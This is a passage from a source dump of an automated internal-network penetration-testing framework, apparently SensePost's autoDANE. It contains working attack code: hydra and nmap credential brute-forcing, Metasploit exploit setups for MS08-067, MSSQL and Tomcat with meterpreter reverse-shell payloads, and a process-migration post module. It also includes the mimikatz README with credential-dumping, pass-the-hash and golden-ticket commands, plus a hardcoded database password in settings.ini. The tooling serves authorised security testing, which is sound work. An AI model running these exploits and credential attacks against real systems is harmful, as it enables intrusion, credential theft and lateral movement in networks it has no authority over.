40 | # if res == "1":
41 | # #print "creds worked"
42 | # params.log("creds worked")
43 | # else:
44 | # #print "creds did not work"
45 | # params.log("creds did not work")
46 |
47 | cursorb = params.db.cursor()
48 | cursorb.execute("call addToLocalCredentialsMap(%s, %s, %s)", (row[0], row[1], (res == "1"), ))
49 | cursorb.close()
50 | #else:
51 | #print "no creds to check"
52 | # params.log("no creds to check")
53 |
--------------------------------------------------------------------------------
/plugins/pivoting/verify_domain_credentials.py:
--------------------------------------------------------------------------------
1 | import os
2 | import time
3 | import base64
4 |
5 |
6 | def run(params):
7 | # sql = """call getDomainCredsToVerify(%s)"""
8 | sql = """SELECT
9 | (f).domain_credentials_id,
10 | (f).ip_address,
11 | (f).domain,
12 | (f).username,
13 | (f).cleartext_password,
14 | (f).host_data_id,
15 | (f).task_list_id
16 | FROM (select getdomaincredstoverify(%s) AS f) x;"""
17 |
18 | cursor = params.db.cursor()
19 | cursor.execute(sql, (params.footprint_id, ))
20 | # TODO: this lists all the dcs that could be used
21 | # change the script to check if a host is inaccessible, and use a
22 | # different one if so
23 | row = cursor.fetchone()
24 | cursor.close()
25 |
26 | if row is not None:
27 | domain_creds_id = row[0]
28 | ip_address = row[1]
29 | domain = row[2]
30 | username = row[3]
31 | cleartext_password = row[4]
32 | task_id = row[6]
33 |
34 | delimited_pwd = ""
35 | for c in cleartext_password:
36 | delimited_pwd = delimited_pwd + "\{}".format(c)
37 |
38 | output_file_name = "temp/" + params.getRandomFileName()
39 | cmd = "hydra -l {0}@{1} -p {2} {3} smb -t 1 > {4}".format(username, domain, delimited_pwd, ip_address, output_file_name)
40 | params.log(cmd.split(">")[0])
41 | params.log("")
42 | os.popen(cmd)
43 | params.log(os.popen("cat {0}".format(output_file_name)).read())
44 | res = os.popen("cat {0} | grep \"1 valid password found\" | wc -l".format(output_file_name)).read()[:-1]
45 |
46 | cursorb = params.db.cursor()
47 | cursorb.execute("select setDomainCredsVerified(%s, %s, %s)",
48 | (params.footprint_id, domain_creds_id, (res == "1"), ))
49 | cursorb.close()
50 |
51 | final_output = ""
52 | while params.log_queue.empty() is False:
53 | final_output += "{0}\r\n".format(params.log_queue.get(False))
54 | final_output = final_output[:-2]
55 |
56 | spCursor = params.db.cursor()
57 | spCursor.execute("select updateTaskStatus(%s, %s, %s, %s)",
58 | (task_id, False, True, base64.b64encode(final_output), ))
59 | spCursor.close()
60 |
--------------------------------------------------------------------------------
/plugins/vuln_exploits/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/vuln_exploits/__init__.py
--------------------------------------------------------------------------------
/plugins/vuln_exploits/exploit_ms08_067.py:
--------------------------------------------------------------------------------
1 | from msf import exploit
2 | import base64
3 |
4 | def run(params):
5 | sql = "select hd.id, hd.ip_address, pd.port_number, v.details from host_data hd join port_data pd on hd.id = pd.host_data_id join vulnerabilities v on v.port_data_id = pd.id where v.id = %s"
6 | cursor = params.db.cursor()
7 | cursor.execute(sql, (params.item_identifier, ))
8 | row = cursor.fetchone()
9 | #print "exploit ms08-067 on host {0}".format(row[1])
10 | #params.log("exploit ms08-067 on host {0}".format(row[1]))
11 | cursor.close()
12 |
13 | setup = [
14 | "use exploit/windows/smb/ms08_067_netapi",
15 | "set PAYLOAD windows/meterpreter/reverse_tcp",
16 | "set RHOST {0}".format(row[1]),
17 | "set LHOST {0}".format(params.getLocalHost()),
18 | "set LPORT {0}".format(params.getOpenPort()),
19 | "exploit"
20 | ]
21 |
22 | log = ""
23 | result = exploit.runMsf(params, row[0], setup, "ms08_067")
24 | for l in result[1]:
25 | log = log + l + "\r\n"
26 | params.log(l)
27 |
28 | if result[0] == True:
29 | cursor = params.db.cursor()
30 | cursor.execute("update host_data set successful_info_gather = true where id = %s", (row[0], ))
31 | cursor.close()
32 |
33 | cursor = params.db.cursor()
34 | cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (row[0], 1, base64.b64encode(log), ))
35 | cursor.close()
36 |
--------------------------------------------------------------------------------
/plugins/vuln_exploits/exploit_weak_sql_creds.py:
--------------------------------------------------------------------------------
1 | from msf import exploit
2 | import base64
3 |
4 | def run(params):
5 | sql = "select hd.id, hd.ip_address, pd.port_number, v.details from host_data hd join port_data pd on hd.id = pd.host_data_id join vulnerabilities v on v.port_data_id = pd.id where v.id = %s"
6 | cursor = params.db.cursor()
7 | cursor.execute(sql, (params.item_identifier, ))
8 | row = cursor.fetchone()
9 | #print "exploit weak sql creds on host {0}".format(row[1])
10 | #params.log("exploit weak sql creds on host {0}".format(row[1]))
11 | cursor.close()
12 |
13 | creds = row[3].split(":")
14 |
15 | setup = [
16 | "use exploit/windows/mssql/mssql_payload",
17 | "set PAYLOAD windows/meterpreter/reverse_tcp",
18 | "set RHOST {0}".format(row[1]),
19 | "set LHOST {0}".format(params.getLocalHost()),
20 | "set LPORT {0}".format(params.getOpenPort()),
21 | "set username {0}".format(creds[0]),
22 | "set password {0}".format(creds[1]),
23 | "exploit"
24 | ]
25 |
26 | log = ""
27 | result = exploit.runMsf(params, row[0], setup, "sql_creds")
28 | for l in result[1]:
29 | log = log + l + "\r\n"
30 | params.log(l)
31 |
32 | if result[0] == True:
33 | cursor = params.db.cursor()
34 | cursor.execute("update host_data set successful_info_gather = true where id = %s", (row[0], ))
35 | cursor.close()
36 |
37 | cursor = params.db.cursor()
38 | cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (row[0], 2, base64.b64encode(log), ))
39 | cursor.close()
40 |
--------------------------------------------------------------------------------
/plugins/vuln_exploits/exploit_weak_tomcat_creds.py:
--------------------------------------------------------------------------------
1 | from msf import exploit
2 | import base64
3 |
4 | def run(params):
5 | sql = "select hd.id, hd.ip_address, pd.port_number, v.details from host_data hd join port_data pd on hd.id = pd.host_data_id join vulnerabilities v on v.port_data_id = pd.id where v.id = %s"
6 | cursor = params.db.cursor()
7 | cursor.execute(sql, (params.item_identifier, ))
8 | row = cursor.fetchone()
9 | #print "exploit weak tomcat creds on host {0}".format(row[1])
10 | #params.log("exploit weak tomcat creds on host {0}".format(row[1]))
11 | cursor.close()
12 |
13 | creds = row[3].split(":")
14 |
15 | setup = [
16 | "use exploit/multi/http/tomcat_mgr_upload",
17 | "set TARGET 1",
18 | "set PAYLOAD windows/meterpreter/reverse_tcp",
19 | "set RHOST {0}".format(row[1]),
20 | "set RPORT {0}".format(row[2]),
21 | "set LHOST {0}".format(params.getLocalHost()),
22 | "set LPORT {0}".format(params.getOpenPort()),
23 | "set username {0}".format(creds[0]),
24 | "set password {0}".format(creds[1]),
25 | "exploit"
26 | ]
27 |
28 | log = ""
29 | result = exploit.runMsf(params, row[0], setup, "tomcat_creds")
30 | for l in result[1]:
31 | log = log + l + "\r\n"
32 | params.log(l)
33 |
34 | if result[0] == True:
35 | cursor = params.db.cursor()
36 | cursor.execute("update host_data set successful_info_gather = true where id = %s", (row[0], ))
37 | cursor.close()
38 |
39 | cursor = params.db.cursor()
40 | cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (row[0], 3, base64.b64encode(log), ))
41 | cursor.close()
42 |
--------------------------------------------------------------------------------
/plugins/vuln_scanning/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/plugins/vuln_scanning/__init__.py
--------------------------------------------------------------------------------
/plugins/vuln_scanning/ms08_067.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | def run(params):
4 | cursor = params.db.cursor()
5 | cursor.execute("select hd.ip_address, pd.id, pd.port_number from host_data hd join port_data pd on hd.id = pd.host_data_id where pd.id = %s", (params.item_identifier, ))
6 | row = cursor.fetchone()
7 |
8 | output_file_name = "temp/" + params.getRandomFileName()
9 | cmd = "nmap {0} -n -p {1} -Pn --script software/ms08-067_check/ms08-067.nse -T {2} > {3}".format(row[0], row[2], params.nmapTiming, output_file_name)
10 | cursor.close()
11 |
12 | params.log(cmd.split(">")[0])
13 |
14 | os.popen(cmd)
15 | params.log(os.popen("cat {0}".format(output_file_name)).read())
16 |
17 | res = os.popen("""cat {0} | grep -e "MS08-067: LIKELY VULNERABLE" -e "MS08-067: VULNERABLE" """.format(output_file_name)).read()
18 |
19 | if len(res) > 1:
20 | cursor = params.db.cursor()
21 | #cursor.execute("call addVulnerability(%s, %s, %s, %s)", (params.footprint_id, row[1], 1, "", ))
22 | cursor.execute("select addVulnerability(%s, %s, %s, %s::varchar)", (params.footprint_id, row[1], 1, "", ))
23 | cursor.close()
24 |
--------------------------------------------------------------------------------
/plugins/vuln_scanning/weak_sql_creds.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | def run(params):
4 | cursor = params.db.cursor()
5 | cursor.execute("select hd.ip_address, pd.id, pd.port_number from host_data hd join port_data pd on hd.id = pd.host_data_id where pd.id = %s", (params.item_identifier, ))
6 | row = cursor.fetchone()
7 |
8 | output_file_name = "temp/" + params.getRandomFileName()
9 | cmd = "nmap -n -p {0} -Pn --script ms-sql-brute --script-args mssql.instance-all,userdb=creds/mssql_users,passdb=creds/mssql_passes {1} -T {2} > {3}".format(row[2], row[0], params.nmapTiming, output_file_name)
10 | cursor.close()
11 |
12 | params.log(cmd.split(">")[0])
13 |
14 | os.popen(cmd)
15 | params.log(os.popen("cat {0}".format(output_file_name)).read())
16 |
17 | res = os.popen("cat {0} | grep \"Login Success\"".format(output_file_name)).read()
18 |
19 | if len(res) > 2:
20 | creds = res[2:-1].split("=")[0].strip()
21 |
22 | cursor = params.db.cursor()
23 | #cursor.execute("call addVulnerability(%s, %s, %s, %s)", (params.footprint_id, row[1], 2, creds, ))
24 | cursor.execute("select addVulnerability(%s, %s, %s, %s::varchar)", (params.footprint_id, row[1], 2, creds, ))
25 | cursor.close()
26 |
--------------------------------------------------------------------------------
/plugins/vuln_scanning/weak_tomcat_creds.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | def run(params):
4 | cursor = params.db.cursor()
5 | cursor.execute("select hd.ip_address, pd.id, pd.port_number from host_data hd join port_data pd on hd.id = pd.host_data_id where pd.id = %s", (params.item_identifier, ))
6 | row = cursor.fetchone()
7 |
8 | output_file_name = "temp/" + params.getRandomFileName()
9 | cmd = "nmap {0} -p {1} -Pn --script software/tomcat_check/tomcat-scan.nse -T {2} > {3}".format(row[0], row[2], params.nmapTiming, output_file_name)
10 | cursor.close()
11 |
12 | params.log(cmd.split(">")[0])
13 | #params.log("")
14 |
15 | os.popen(cmd)
16 | params.log(os.popen("cat {0}".format(output_file_name)).read())
17 |
18 | res = os.popen("cat {0} | grep \"Found combination\" -B 7 | grep \"Found combination\"".format(output_file_name)).read()
19 |
20 | if len(res) > 3:
21 | creds = res[:-1].split(" ")[3]
22 |
23 | cursor = params.db.cursor()
24 | #cursor.execute("call addVulnerability(%s, %s, %s, %s)", (params.footprint_id, row[1], 3, creds, ))
25 | cursor.execute("select addVulnerability(%s, %s, %s, %s::varchar)", (params.footprint_id, row[1], 3, creds, ))
26 | cursor.close()
27 |
--------------------------------------------------------------------------------
/settings.ini:
--------------------------------------------------------------------------------
1 | [postgres]
2 | host=localhost
3 | user=autodane
4 | pass=OHZdz7CW8Lv4PCa
5 | db=autodane
6 |
--------------------------------------------------------------------------------
/software/.adsmbexec.py.swp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/software/.adsmbexec.py.swp
--------------------------------------------------------------------------------
/software/metasploit/modules/post/windows/manage/sp_smart_migrate.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This module requires Metasploit: http://metasploit.com/download
3 | # Current source: https://github.com/rapid7/metasploit-framework
4 | ##
5 |
6 | require 'msf/core'
7 | require 'rex'
8 |
9 | class Metasploit3 < Msf::Post
10 |
11 | def initialize(info={})
12 | super( update_info( info,
13 | 'Name' => 'Slightly modified Windows Manage Smart Process Migration',
14 | 'Description' => %q{ This module will migrate a Meterpreter session.
15 | It will first attempt to migrate to explorer.exe for the current user. Failing that,
16 | it will attempt any other explorer.exe processes. Finally it will fall back to winlogon.exe},
17 | 'License' => MSF_LICENSE,
18 | 'Author' => [ 'thelightcosine'],
19 | 'Platform' => [ 'win' ],
20 | 'SessionTypes' => [ 'meterpreter' ]
21 | ))
22 |
23 |
24 | end
25 |
26 | def run
27 | server = client.sys.process.open
28 | original_pid = server.pid
29 | print_status("Current server process: #{server.name} (#{server.pid})")
30 |
31 | uid = client.sys.config.getuid
32 |
33 | processes = client.sys.process.get_processes
34 |
35 | uid_explorer_procs = []
36 | explorer_procs = []
37 | winlogon_procs = []
38 | processes.each do |proc|
39 | uid_explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] == uid
40 | explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] != uid
41 | winlogon_procs << proc if proc['name'] == "winlogon.exe"
42 | end
43 |
44 | print_status "Attempting to move into winlogon.exe"
45 | winlogon_procs.each { |proc| return if attempt_migration(proc['pid']) }
46 | print_status "Attempting to move into explorer.exe for current user..."
47 | uid_explorer_procs.each { |proc| return if attempt_migration(proc['pid']) }
48 | print_status "Attempting to move into explorer.exe for other users..."
49 | explorer_procs.each { |proc| return if attempt_migration(proc['pid']) }
50 |
51 | print_error "Was unable to sucessfully migrate into any of our likely candidates"
52 | end
53 |
54 |
55 | def attempt_migration(target_pid)
56 | begin
57 | print_good("Migrating to #{target_pid}")
58 | client.core.migrate(target_pid)
59 | print_good("Successfully migrated to process #{target_pid}")
60 | return true
61 | rescue ::Exception => e
62 | print_error("Could not migrate in to process.")
63 | print_error(e.to_s)
64 | return false
65 | end
66 | end
67 | end
68 |
--------------------------------------------------------------------------------
/software/mimikatz_trunk/README.md:
--------------------------------------------------------------------------------
1 | # mimikatz
2 |
3 | **`mimikatz`** is a tool I've made to learn `C` and make somes experiments with Windows security.
4 |
5 | It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. **`mimikatz`** can also perform pass-the-hash, pass-the-ticket or build _Golden tickets_.
6 |
7 | ```
8 | .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
9 | .## ^ ##.
10 | ## / \ ## /* * *
11 | ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
12 | '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
13 | '#####' with 13 modules * * */
14 |
15 |
16 | mimikatz # privilege::debug
17 | Privilege '20' OK
18 |
19 | mimikatz # sekurlsa::logonpasswords
20 |
21 | Authentication Id : 0 ; 515764 (00000000:0007deb4)
22 | Session : Interactive from 2
23 | User Name : Gentil Kiwi
24 | Domain : vm-w7-ult-x
25 | SID : S-1-5-21-1982681256-1210654043-1600862990-1000
26 | msv :
27 | [00000003] Primary
28 | * Username : Gentil Kiwi
29 | * Domain : vm-w7-ult-x
30 | * LM : d0e9aee149655a6075e4540af1f22d3b
31 | * NTLM : cc36cf7a8514893efccd332446158b1a
32 | * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
33 | tspkg :
34 | * Username : Gentil Kiwi
35 | * Domain : vm-w7-ult-x
36 | * Password : waza1234/
37 | ...
38 | ```
39 | But that's not all! `Crypto`, `Terminal Server`, `Events`, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, _yes_).
40 |
41 | If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases
42 |
43 |
44 | ## Quick usage
45 | ```
46 | log
47 | privilege::debug
48 | ```
49 |
50 | ### sekurlsa
51 | ```
52 | sekurlsa::logonpasswords
53 | sekurlsa::tickets /export
54 |
55 | sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
56 | ```
57 |
58 | ### kerberos
59 | ```
60 | kerberos::list /export
61 | kerberos::ptt c:\chocolate.kirbi
62 |
63 | kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
64 | ```
65 |
66 | ### crypto
67 | ```
68 | crypto::capi
69 | crypto::cng
70 |
71 | crypto::certificates /export
72 | crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
73 |
74 | crypto::keys /export
75 | crypto::keys /machine /export
76 | ```
77 |
78 | ### vault & lsadump
79 | ```
80 | vault::cred
81 | vault::list
82 |
83 | token::elevate
84 | vault::cred
85 | vault::list
86 | lsadump::sam
87 | lsadump::secrets
88 | lsadump::cache
89 | token::revert
90 | ```
91 |
92 | ## Build
93 | `mimikatz` is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
94 | * for `mimikatz` and `mimilib` : Visual Studio 2010, 2012 or 2013 for Desktop (**2013 Express for Desktop is free and supports x86 & x64** - http://www.microsoft.com/download/details.aspx?id=43733)
95 | * _for `mimikatz driver` (and `ddk2003` platform) : Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800_
96 |
97 | `mimikatz` uses `SVN` for source control, but is now available with `GIT` too!
98 | You can use any tools you want to sync, even incorporated `GIT` in Visual Studio 2013 =)
99 |
100 | ### Synchronize!
101 | * GIT URL is : https://github.com/gentilkiwi/mimikatz.git
102 | * SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk
103 | * ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip
104 |
105 | ### Build the solution
106 | * After opening the solution, `Build` / `Build Solution` (you can change architecture)
107 | * `mimikatz` is now built and ready to be used! (`Win32` / `x64`)
108 | * you can have error `MSB3073` about `_build_.cmd` and `mimidrv`, it's because the driver cannot be build without Windows Driver Kit **7.1** (WinDDK), but `mimikatz` and `mimilib` are OK.
109 |
110 | ### ddk2003
111 | With this optional MSBuild platform, you can use the WinDDK build tools, and the default `msvcrt` runtime (smaller binaries, no dependencies)
112 |
113 | For this optional platform, Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio **2010** are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.
114 |
115 | Follow instructions:
116 | * http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
117 | * _http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader_
118 |
119 | ## Licence
120 | CC BY 3.0 FR licence - http://creativecommons.org/licenses/by/3.0/fr/
121 |
122 | ## Author
123 | Benjamin DELPY `gentilkiwi`, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )
124 |
125 | This is a **personal** development, please respect its philosophy and don't use it for bad things!
--------------------------------------------------------------------------------
/software/mimikatz_trunk/Win32/mimidrv.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/software/mimikatz_trunk/Win32/mimidrv.sys
--------------------------------------------------------------------------------
/software/mimikatz_trunk/Win32/mimikatz.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/software/mimikatz_trunk/Win32/mimikatz.exe
--------------------------------------------------------------------------------
/software/mimikatz_trunk/Win32/mimilib.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/software/mimikatz_trunk/Win32/mimilib.dll
--------------------------------------------------------------------------------
/software/mimikatz_trunk/x64/mimidrv.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/software/mimikatz_trunk/x64/mimidrv.sys
--------------------------------------------------------------------------------
/software/mimikatz_trunk/x64/mimikatz.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/software/mimikatz_trunk/x64/mimikatz.exe
--------------------------------------------------------------------------------
/software/mimikatz_trunk/x64/mimilib.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/software/mimikatz_trunk/x64/mimilib.dll
--------------------------------------------------------------------------------
/software/ms08-067_check/COPYING:
--------------------------------------------------------------------------------
1 | We provide this software under a slightly modified version of the
2 | Apache Software License. The only changes to the document were the
3 | replacement of "Apache" with "Impacket" and "Apache Software Foundation"
4 | with "CORE Security Technologies". Feel free to compare the resulting
5 | document to the official Apache license.
6 |
7 | The `Apache Software License' is an Open Source Initiative Approved
8 | License.
9 |
10 | The Apache Software License, Version 1.1
11 | Modifications by CORE Security Technologies (see above)
12 |
13 | Copyright (c) 2000 The Apache Software Foundation. All rights
14 | reserved.
15 |
16 | Redistribution and use in source and binary forms, with or without
17 | modification, are permitted provided that the following conditions
18 | are met:
19 |
20 | 1. Redistributions of source code must retain the above copyright
21 | notice, this list of conditions and the following disclaimer.
22 |
23 | 2. Redistributions in binary form must reproduce the above copyright
24 | notice, this list of conditions and the following disclaimer in
25 | the documentation and/or other materials provided with the
26 | distribution.
27 |
28 | 3. The end-user documentation included with the redistribution,
29 | if any, must include the following acknowledgment:
30 | "This product includes software developed by
31 | CORE Security Technologies (http://www.coresecurity.com/)."
32 | Alternately, this acknowledgment may appear in the software itself,
33 | if and wherever such third-party acknowledgments normally appear.
34 |
35 | 4. The names "Impacket" and "CORE Security Technologies" must
36 | not be used to endorse or promote products derived from this
37 | software without prior written permission. For written
38 | permission, please contact oss@coresecurity.com.
39 |
40 | 5. Products derived from this software may not be called "Impacket",
41 | nor may "Impacket" appear in their name, without prior written
42 | permission of CORE Security Technologies.
43 |
44 | THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
45 | WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
46 | OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
47 | DISCLAIMED. IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
48 | ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
49 | SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
50 | LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
51 | USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
52 | ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
53 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
54 | OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
55 | SUCH DAMAGE.
56 |
57 | Smb.py and nmb.py are based on Pysmb by Michael Teo
58 | (http://miketeo.net/projects/pysmb/), and are distributed under the
59 | following license:
60 |
61 | This software is provided 'as-is', without any express or implied
62 | warranty. In no event will the author be held liable for any damages
63 | arising from the use of this software.
64 |
65 | Permission is granted to anyone to use this software for any purpose,
66 | including commercial applications, and to alter it and redistribute it
67 | freely, subject to the following restrictions:
68 |
69 | 1. The origin of this software must not be misrepresented; you must
70 | not claim that you wrote the original software. If you use this
71 | software in a product, an acknowledgment in the product
72 | documentation would be appreciated but is not required.
73 |
74 | 2. Altered source versions must be plainly marked as such, and must
75 | not be misrepresented as being the original software.
76 |
77 | 3. This notice cannot be removed or altered from any source
78 | distribution.
79 |
--------------------------------------------------------------------------------
/software/ms08-067_check/ms08-067.nse:
--------------------------------------------------------------------------------
1 | local msrpc = require "msrpc"
2 | local nmap = require "nmap"
3 | local smb = require "smb"
4 | local stdnse = require "stdnse"
5 | local string = require "string"
6 | local table = require "table"
7 |
8 | description = [[
9 | Checks for vulnerabilities:
10 | * MS08-067, a Windows RPC vulnerability
11 | * Conficker, an infection by the Conficker worm
12 | * Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in Windows 2000
13 | * SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
14 | * MS06-025, a Windows Ras RPC service vulnerability
15 | * MS07-029, a Windows Dns Server RPC service vulnerability
16 |
17 | WARNING: These checks are dangerous, and are very likely to bring down a server.
18 | These should not be run in a production environment unless you (and, more importantly,
19 | the business) understand the risks!
20 |
21 | As a system administrator, performing these kinds of checks is crucial, because
22 | a lot more damage can be done by a worm or a hacker using this vulnerability than
23 | by a scanner. Penetration testers, on the other hand, might not want to use this
24 | script -- crashing services is not generally a good way of sneaking through a
25 | network.
26 |
27 | If you set the script parameter unsafe, then scripts will run that are almost
28 | (or totally) guaranteed to crash a vulnerable system; do NOT specify unsafe
29 | in a production environment! And that isn't to say that non-unsafe scripts will
30 | not crash a system, they're just less likely to.
31 |
32 | If you set the script parameter safe, then script will run that rarely or never
33 | crash a vulnerable system. No promises, though.
34 |
35 | MS08-067. Checks if a host is vulnerable to MS08-067, a Windows RPC vulnerability that
36 | can allow remote code execution. Checking for MS08-067 is very dangerous, as the check
37 | is likely to crash systems. On a fairly wide scan conducted by Brandon Enright, we determined
38 | that on average, a vulnerable system is more likely to crash than to survive
39 | the check. Out of 82 vulnerable systems, 52 crashed.
40 | At the same time, MS08-067 is extremely critical to fix. Metasploit has a working and
41 | stable exploit for it, and any system vulnerable can very easily be compromised.
42 | Conficker. Checks if a host is infected with a known Conficker strain. This check
43 | is based on the simple conficker scanner found on this page:
44 | http://iv.cs.uni-bonn.de/wg/cs/applications/containing-conficker.
45 | Thanks to the folks who wrote that scanner!
46 |
47 | regsvc DoS. Checks if a host is vulnerable to a crash in regsvc, caused
48 | by a null pointer dereference. I inadvertently discovered this crash while working
49 | on smb-enum-sessions, and discovered that it was repeatable. It's been
50 | reported to Microsoft (case #MSRC8742).
51 |
52 | This check WILL crash the service, if it's vulnerable, and requires a guest account
53 | or higher to work. It is considered unsafe.
54 |
55 | SMBv2 DoS. Performs a denial-of-service against the vulnerability disclosed in
56 | CVE-2009-3103. Checks if the server went offline. This works against Windows Vista
57 | and some versions of Windows 7, and causes a bluescreen if successful. The
58 | proof-of-concept code at http://seclists.org/fulldisclosure/2009/Sep/39 was used,
59 | with one small change.
60 |
61 | MS06-025. Vulnerability targets the RasRpcSumbitRequest() RPC method which is
62 | a part of RASRPC interface that serves as a RPC service for configuring and
63 | getting information from the Remote Access and Routing service. RASRPC can be
64 | accessed using either "\ROUTER" SMB pipe or the "\SRVSVC" SMB pipe (usually on Windows XP machines).
65 | This is in RPC world known as "ncan_np" RPC transport. RasRpcSumbitRequest()
66 | method is a generic method which provides different functionalities according
67 | to the RequestBuffer structure and particularly the RegType field within that
68 | structure. RegType field is of enum ReqTypes type. This enum type lists all
69 | the different available operation that can be performed using the RasRpcSubmitRequest()
70 | RPC method. The one particular operation that this vuln targets is the REQTYPE_GETDEVCONFIG
71 | request to get device information on the RRAS.
72 |
73 | MS07-029. Vulnerability targets the R_DnssrvQuery() and R_DnssrvQuery2() RPC method which is
74 | a part of DNS Server RPC interface that serves as a RPC service for configuring and
75 | getting information from the DNS Server service. DNS Server RPC service can be
76 | accessed using "\dnsserver" SMB named pipe. The vulnerability is triggered when
77 | a long string is send as the "zone" parameter which causes the buffer overflow which
78 | crashes the service.
79 |
80 | (Note: if you have other SMB/MSRPC vulnerability checks you'd like to see added, and
81 | you can show me a tool with a license that is compatible with Nmap's, post a request
82 | on the nmap-dev mailing list and I'll add it to my list [Ron Bowes].)
83 | ]]
84 | ---
85 | --@usage
86 | -- nmap --script smb-check-vulns.nse -p445
87 | -- sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139
88 | --
89 | --@output
90 | -- Host script results:
91 | -- | smb-check-vulns:
92 | -- | MS08-067: NOT VULNERABLE
93 | -- | Conficker: Likely CLEAN
94 | -- | regsvc DoS: regsvc DoS: NOT VULNERABLE
95 | -- | SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
96 | -- | MS06-025: NO SERVICE (the Ras RPC service is inactive)
97 | -- |_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
98 | --
99 | -- @args unsafe If set, this script will run checks that, if the system isn't
100 | -- patched, are basically guaranteed to crash something. Remember that
101 | -- non-unsafe checks aren't necessarily safe either)
102 | -- @args safe If set, this script will only run checks that are known (or at
103 | -- least suspected) to be safe.
104 | -----------------------------------------------------------------------
105 |
106 | author = "Ron Bowes"
107 | copyright = "Ron Bowes"
108 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
109 | categories = {"intrusive","exploit","dos","vuln"}
110 | -- run after all smb-* scripts (so if it DOES crash something, it doesn't kill
111 | -- other scans have had a chance to run)
112 | dependencies = {
113 | "smb-brute", "smb-enum-sessions", "smb-security-mode",
114 | "smb-enum-shares", "smb-server-stats",
115 | "smb-enum-domains", "smb-enum-users", "smb-system-info",
116 | "smb-enum-groups", "smb-os-discovery", "smb-enum-processes",
117 | "smb-psexec",
118 | };
119 |
120 |
121 | hostrule = function(host)
122 | return smb.get_port(host) ~= nil
123 | end
124 |
125 | local VULNERABLE = 1
126 | local PATCHED = 2
127 | local UNKNOWN = 3
128 | local NOTRUN = 4
129 | local INFECTED = 5
130 | local INFECTED2 = 6
131 | local CLEAN = 7
132 | local NOTUP = 8
133 |
134 | ---Check if the server is patched for MS08-067. This is done by calling NetPathCompare with an
135 | -- illegal string. If the string is accepted, then the server is vulnerable; if it's rejected, then
136 | -- you're safe (for now).
137 | --
